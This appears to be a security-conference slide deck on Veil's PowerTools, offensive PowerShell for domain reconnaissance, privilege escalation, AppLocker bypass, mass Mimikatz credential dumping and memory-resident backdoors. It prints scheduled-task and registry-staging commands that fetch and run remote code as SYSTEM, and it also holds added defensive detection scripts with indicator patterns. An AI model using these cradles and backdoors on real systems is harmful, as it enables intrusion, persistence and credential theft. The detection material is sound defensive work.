Drilling Deeper with Veil’s PowerTools Justin Warner, Will Schroeder Veris Group’s Adaptive Threat Division

Page 1: Drilling Deeper with Veil's PowerTools
Justin Warner, Will Schroeder
Veris Group's Adaptive Threat Division

Page 2: @sixdub
◎ Pentester and red teamer for the Adaptive Threat Division of Veris Group
◎ Lots of interest: red team ops, reverse engineering, adversarial tactics, etc.
◎ Developer on the Veil-Framework and co-founder of Veil's PowerTools

Page 3: @harmj0y
◎ Security researcher and red teamer for the Adaptive Threat Division of Veris Group
◎ Co-founder of the Veil-Framework and founder of Veil's PowerTools
◎ Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides

Page 4: tl;dr
◎ Introduction
◎ PowerView
◎ PowerUp
◎ PowerPick
◎ PewPewPew
◎ PowerBreach
◎ Dear M$
◎ Demos
◎ Questions

Page 5: Introduction
How We Got Here

Page 6: The Veil-Framework
◎ An offensive toolkit aimed at bridging the gap between pentesting and red teaming capabilities
◎ Started with the release of Veil-Evasion
  ○ Expanded with Catapult, Pillage, and PowerView
◎ CarolinaCon 2014 - "The Veil-Framework"

Page 7: Veil's PowerTools
◎ All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo
◎ PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python projects

Page 8: Sidenote: Why PowerShell
○ PowerShell provides (out of the box):
  □ Full .NET access
  □ Application whitelisting
  □ Direct access to the Win32 API
  □ Ability to execute purely in memory
  □ Default installation on Win7+!
○ "Why I Choose PowerShell as an Attack Platform"
  □ http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html

Page 9: "Bad Guys"

Page 10: PowerShell: "Microsoft's Post-Exploitation Language" - @obscuresec

Page 11: PowerView
Domain Situational Awareness

Page 12: Background
◎ Think dsquery on steroids... and cocaine
◎ First started because a client banned "net" commands on domain machines
◎ Otherwise initially inspired by Rob Fuller's netview.exe tool
  ○ Wanted something more flexible that also didn't drop a binary to disk

Page 13: User Hunting
◎ Goal: find which domain machines specific users are logged into
◎ Invoke-UserHunter: finds where target users or group members are logged into on the network
◎ Invoke-StealthUserHunter: extracts user homeDirectories from AD, then gets sessions on all of these file servers to hunt for targets
  ○ Significantly less traffic than Invoke-UserHunter

Page 14: Offensive Event Parsing
◎ Once you get DA, domain controller event logs make it trivial to track down user locations
◎ PowerView's Get-UserLogonEvents lets you easily extract account logon events (4624) from a host
◎ Invoke-UserEventHunter wraps this all up into a weaponized form

Page 15: Domain Trusts
◎ PowerView can now enumerate and exploit existing domain trusts:
  ○ Get-NetDomainTrusts, Get-NetForestDomains
◎ Most PowerView functions now accept a "-Domain <name>" flag, allowing them to operate across trusts
  ○ e.g. Get-NetUsers -Domain sub.test.local
◎ Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold

Page 17: Data Mining
◎ PowerView's Invoke-ShareFinder -CheckAccess can find all shares readable by the current user
◎ Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder
◎ Spits out a .csv of found files, sortable by creation or last access times

Page 18: PowerUp
Automating Windows Privesc

Page 19: Background
◎ On past assessments, had to escalate privileges on a locked down workstation
◎ Kernel exploits wouldn't work, so fell back to vulnerable service binaries
◎ More or less did everything manually, wanted something a bit easier
  ○ Started implementing the "Encyclopedia of Privesc"

Page 20: Windows Services
◎ One of the most effective escalation vectors was (and still is) vulnerable Windows services
  ○ Sometimes can modify a service itself
  ○ Get-ServicePerms will check for these
◎ However, many organizations overlook the permissions for service binaries :)
  ○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an agent

Page 21: .DLL Hijacking
◎ Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable
◎ If you have write access to any folder in PATH, there's a good chance you can drop a malicious DLL and escalate privileges
  ○ Invoke-FindPathHijack will search for these opportunities
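The two conditions that Get-ServiceEXEPerms and Invoke-FindPathHijack look for (service binaries and PATH directories writable by low-privilege principals) can be audited from the defender's side with the check below. This is an added example, not code from PowerTools; it assumes it runs as an administrator on a host you manage, and the SID list and the rights pattern are choices made for this example.

```powershell
# Added example (not PowerTools code): flag service binaries and PATH directories
# that low-privilege principals can modify. Run as an administrator.

# Principals whose write access is a finding (constructed list; extend for your environment).
$LowPrivSids = @(
    'S-1-1-0',        # Everyone
    'S-1-5-11',       # Authenticated Users
    'S-1-5-32-545',   # BUILTIN\Users
    'S-1-5-4'         # INTERACTIVE
)

function Test-LowPrivWritable {
    # True when an Allow ACE grants a low-privilege SID a right that lets it change
    # the file/directory contents, its ACL, or its owner.
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($LowPrivSids -notcontains $sid) { continue }
        # FileSystemRights renders as names ("Modify, Synchronize") or, for generic rights, as a raw number.
        $rights = $ace.FileSystemRights
        if ("$rights" -match '\b(Write|WriteData|AppendData|Modify|FullControl|ChangePermissions|TakeOwnership)\b') { return $true }
        if (([int]$rights -band 0x10000000) -or ([int]$rights -band 0x40000000)) { return $true }  # GENERIC_ALL / GENERIC_WRITE
    }
    return $false
}

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service PathName, whether quoted or not.
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $null
}

$Findings = @(
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if ($bin -and (Test-LowPrivWritable $bin)) {
            [pscustomobject]@{ Kind = 'ServiceBinary'; Name = $svc.Name; Path = $bin }
        }
    }
    foreach ($dir in ($env:Path -split ';' | Where-Object { $_ -and (Test-Path -LiteralPath $_) } | Select-Object -Unique)) {
        if (Test-LowPrivWritable $dir) {
            [pscustomobject]@{ Kind = 'PathDirectory'; Name = $dir; Path = $dir }
        }
    }
)
$Findings | Format-Table -AutoSize
```

An unquoted service path containing spaces is a separate weakness this check does not report; compare the parsed binary against the raw PathName if you want that as well.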

Page 22: PowerUp
◎ Automates everything we've talked about, and more
◎ Invoke-AllChecks will run all current checks against a host
◎ Functions exist to abuse most of the escalation vectors found

Page 23: PowerPick
Lock Picking the AppLocker

Page 24: Background
◎ Incident responders are recognizing and targeting PowerShell.exe
  ○ Had a client write HIPS rules against psh_psexec, YA, for reals
◎ We wanted to be prepared for more situations like this
◎ Developed PowerPick as a combination of solutions to run PowerShell without powershell.exe

Page 25: Bypassing the Blacklist
◎ Used assemblies in .NET/C# to execute code
  ○ System.Management.Automation
◎ Developed SharpPick
  ○ http://www.sixdub.net/2014/12/02/inexorable-powershell-a-red-teamers-tale-of-overcoming-simple-applocker-policies/
◎ To defeat this with a blacklist policy (not ideal), you must permission off or block DLLs in the Global Assembly Cache (GAC)
  ○ C:\Windows\Assembly\*

Page 26: OH BTW

Page 27: Runspaces in Unmanaged Code
◎ SharpPick wasn't very sexy
  ○ Binary on disk = Lame!
◎ Lee Christensen (@tifkin_) authored "UnmanagedPowerShell" to utilize .NET assemblies from C
  ○ Uses CLR and custom .NET assembly in memory
  ○ https://github.com/leechristensen/UnmanagedPowerShell
◎ Transformed this code into a reflective DLL = ReflectivePick

Page 28: PowerShell Inception = Injection!!
◎ Decided it needed more PowerShell
◎ Embedded ReflectivePick into Invoke-ReflectivePEInjection from PowerSploit by @josephbialek
  ○ Created Invoke-PSInjector
◎ Injects DLL into remote process that runs PowerShell code

Page 29: ReflectivePick Diagram
(diagram; labels recovered from the slide: *.exe, Invoke-PSInjector, ReflectivePick, .NET Assembly, Download Cradle)
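Defenders can look for the injection pattern in the diagram above by finding processes that have the PowerShell engine loaded without being a known PowerShell host. This is an added example, not PowerTools or UnmanagedPowerShell code; the known-host list is an assumption made for this example, and it should run elevated so other users' processes are readable.

```powershell
# Added example (not PowerTools code): list processes hosting the PowerShell engine
# that are not a known PowerShell host. Run as an administrator.

# Image names that legitimately load the engine (constructed list; extend it with
# your own management agents).
$KnownHosts = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost', 'sdiagnhost')

function Get-UnmanagedPowerShellHost {
    foreach ($p in Get-Process) {
        # Protected processes and cross-bitness inspection throw; skip those.
        try { $mods = $p.Modules } catch { continue }
        # .NET Framework may load the native image (System.Management.Automation.ni.dll)
        # instead of the IL assembly, so match both names.
        $engine = $mods |
            Where-Object { $_.ModuleName -match '^System\.Management\.Automation(\.ni)?\.dll$' } |
            Select-Object -First 1
        if (-not $engine) { continue }
        if ($KnownHosts -contains $p.ProcessName) { continue }
        [pscustomobject]@{
            ProcessId = $p.Id
            Name      = $p.ProcessName
            Image     = $p.Path
            Engine    = $engine.FileName
        }
    }
}

Get-UnmanagedPowerShellHost | Format-Table -AutoSize
```

A point-in-time scan misses short-lived hosts; Sysmon's image-load event (ID 7) filtered on the same module names gives the signal continuously, and because script block logging is implemented in the engine itself, a PowerShell 5 engine hosted this way still writes 4104 events.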

Page 30: Invoke-PowerCeption?

Page 31: PewPewPew
Launching Lazerz at your Targets

Page 33: Invoke-Mass*
◎ Model to run PowerShell scripts on a mass number of machines and retrieve results:
  1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file
  2. An IEX() one-liner is executed on machines through WMI to download/execute the hosted code
  3. Results are POSTed back to the local webserver

Page 34: Invoke-MassMimikatz
◎ Executes PowerSploit's Invoke-Mimikatz on multiple machines without PSRemoting
◎ Raw Mimikatz results are saved on the pivot host
◎ Result files are parsed and Server:Credential objects are output to the pipeline

Page 35: Invoke-MassMimikatz

Page 36: Invoke-MassSearch
◎ Microsoft has another gift for attackers, the Windows Search Indexing Service
  ○ Why search through all of a system's files when Windows does this for you?
◎ Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz
  ○ Allows you to query the search indexer across machines where you have admin access

Page 37: PowerBreach
New Release

Page 38: Background
◎ One obvious gap remaining in the workflow of Veil PowerTools
◎ Motivation: offense in depth theory
◎ Wanted multiple easy ways to remain resident on the compromised systems
  ○ Memory only

Page 39: PowerBreach
◎ Yes... More PowerShell
  ○ Why not utilize our favorite scripting language?!
◎ Goal: automate a bunch of techniques/tools to backdoor a system
◎ Multiple triggers, various host/network signatures
  ○ We will show some of the "cool" ones

Page 40: Invoke-EventLogBackdoor
◎ Based on Shmoocon 2013 "Wipe The Drive" by Jake Williams (@MalwareJake)
◎ Uses Get-WinEvent to monitor Windows event logs for failed RDP attempts
◎ When it recognizes the "trigger" username, phones home to the attacker
  ○ With an IEX(...) download cradle

Page 41: Invoke-PortKnockBackdoor
◎ Based upon Get-Packet by Robbie Foust: http://blog.robbiefoust.com/?p=68
  ○ Uses system.net.sockets.socket to create a raw socket
  ○ Uses socket.iocontrol to make it promiscuous
◎ Promiscuously sniffs traffic on the system and inspects data for a "magic" trigger value
  ○ UDP, TCP, ICMP

Page 42: Invoke-DeadUserBackdoor
◎ Common action of attackers is to add domain/local users
◎ Uses ADSI to monitor for a user's existence
◎ If the user is not found, assumes the worst and phones home

Page 43: Invoke-ResolverBackdoor
◎ Attempts to be a little stealthier and usable on external assessments
◎ Resolves a specified DNS name on an interval, and if the resolution doesn't equal a predefined IP...
◎ ... PHONE HOME TO THAT IP!

Page 44: Persistence... If you must
◎ Focuses more on non-persistent backdoors
◎ Scheduled tasks seem to work really well for PowerShell in domain networks

schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://server/script.ps1''))'" /sc onlogon /ru System

Page 45: Registry Storage
◎ Better yet, stage your script in the registry!

$backdoor = "write-host 123"
Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name 'secret' -Value $backdoor
schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:HARDWARE secret).secret'" /sc onlogon /ru System
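From the defender's side, the scheduled-task and registry-staging examples above share a small set of command-line indicators with the WMI-launched IEX one-liner from the Invoke-Mass* model. The added example below (not PowerTools code) checks scheduled task actions for those indicators and lists any values staged at the root of HKLM\HARDWARE; the indicator patterns are a constructed starting point for this example, not a complete rule set.

```powershell
# Added example (not PowerTools code): review scheduled task actions for PowerShell
# download-cradle and registry-staging patterns. Run as an administrator.

# Constructed indicator patterns; PowerShell -match is case-insensitive by default.
$Indicators = [ordered]@{
    'invoke-expression' = '\bIEX\b|Invoke-Expression'
    'download-cradle'   = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b'
    'hidden-window'     = '-w(indowstyle)?\s+hidden'
    'no-profile'        = '-nop\b|-noprofile'
    'non-interactive'   = '-noni\b|-noninteractive'
    'registry-staged'   = '\bgp\b|Get-ItemProperty'
    'encoded-command'   = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
}

function Get-PowerShellIndicators {
    # Return the names of every indicator whose pattern matches the command line.
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($name in $Indicators.Keys) {
        if ($CommandLine -match $Indicators[$name]) { $name }
    }
}

function Find-SuspiciousTaskActions {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Join program and arguments so it does not matter how schtasks split them.
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -notmatch 'powershell') { continue }
            $hits = @(Get-PowerShellIndicators $cmd)
            if ($hits.Count -eq 0) { continue }
            [pscustomobject]@{
                Task       = $task.TaskPath + $task.TaskName
                RunAs      = $task.Principal.UserId
                Indicators = $hits -join ', '
                Command    = $cmd
            }
        }
    }
}

function Get-HardwareHiveValues {
    # HKLM\HARDWARE is a volatile hive rebuilt at boot; a value at its root is unusual
    # and is exactly where the staging example above puts its script.
    $key = Get-Item -LiteralPath 'HKLM:\HARDWARE'
    foreach ($name in $key.GetValueNames()) {
        [pscustomobject]@{ Name = $name; Value = $key.GetValue($name) }
    }
}

Find-SuspiciousTaskActions | Format-Table -AutoSize
Get-HardwareHiveValues | Format-Table -AutoSize
```

Get-PowerShellIndicators can also be run over process-creation command lines (Security event 4688 with command-line auditing enabled, or Sysmon event ID 1), which is where the WMI-launched one-liner of the Invoke-Mass* model shows up rather than in a task definition.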

Page 46: So what?
◎ Nothing revolutionary here!
◎ Nothing worse than owning a system and not being able to get back on later!
◎ Real power comes when combining PowerTools
  ○ PewPewPew with PowerBreach

Page 47: 2 Cents
Almost ready for the show!

Page 48: Obligatory Defense Slide
◎ HIPS and whitelisting generally help endpoint defense
◎ Enterprise incident response capabilities
  ○ Memory-only capabilities, but scripts ("malware") are able to be easily recovered and analyzed
◎ Need a clear way to restrict PowerShell & .NET assemblies to certain users

Page 49: True Story…

Page 50: Demos

Page 51: Questions?
◎ Justin
  ○ @sixdub
  ○ http://www.sixdub.net/
  ○ justin [at] sixdub.net
◎ Will
  ○ @harmj0y
  ○ http://blog.harmj0y.net/
  ○ will [at] harmj0y.net
◎ https://github.com/veil-framework/PowerTools